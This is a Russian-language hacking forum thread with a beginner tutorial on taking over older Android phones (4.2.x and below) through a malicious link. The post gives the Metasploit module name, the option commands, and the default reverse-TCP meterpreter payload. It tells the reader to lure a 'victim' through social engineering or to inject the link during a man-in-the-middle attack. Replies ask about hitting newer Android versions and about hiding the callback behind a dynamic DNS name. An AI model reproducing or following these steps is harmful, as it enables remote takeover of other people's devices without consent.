• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Android WebView Exploit или взлом андроида по ссылке

Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)

5.png


Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код: 
use exploit/android/browser/webview_addjavascriptinterface
1.jpg


3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
3.jpg


4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...

4.png


5)Ловим метерпретер сессию

6.jpg


 
  • Нравится
Реакции: Anomalya, mz111, konstata3 и ещё 6
Нажмите, чтобы раскрыть...
K

kinevkt

Прошу прощения, если ошибаюсь, но тема, которую вы дали, тоже для старых версий андройда.
 
thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
kinevkt сказал(а):
Прошу прощения, если ошибаюсь, но тема, которую вы дали, тоже для старых версий андройда.
Нажмите, чтобы раскрыть...
Поддерживаю. DarkNode : Как быть с android 5.0/5.1/6/0 ?
[doublepost=1489347544,1489330382][/doublepost]DarkNode: Вопрос от новичка. Возможно ли заменить конечную нагрузку (цифры которые получаются, ваш пример 192.168.137.152: 4444 ) на название (например от no-ip) ? Например " newslife.ddns.net :8080 "
[doublepost=1489352321][/doublepost]DarkNode: Что делать если отсутствует AutoLoadAndroid true
и пользуешься whonix gateway ( прописывать айпишник в rsvhost, lhost который я сам назначил 10.152.152.68 ) ?
 

Вложения

  • 1.PNG
    1.PNG
    78,7 КБ · Просмотры: 199
  • 2.PNG
    2.PNG
    46,2 КБ · Просмотры: 163
Последнее редактирование:
thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
Как настроить eth 1 интернет подключения (чтобы появился ip адрес кроме eth0 10.0.2.15) ?
 
Nano22

Nano22

Green Team
02.02.2018
35
1
BIT
0
а где и как искать новые браузер эксплойты под андроид
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ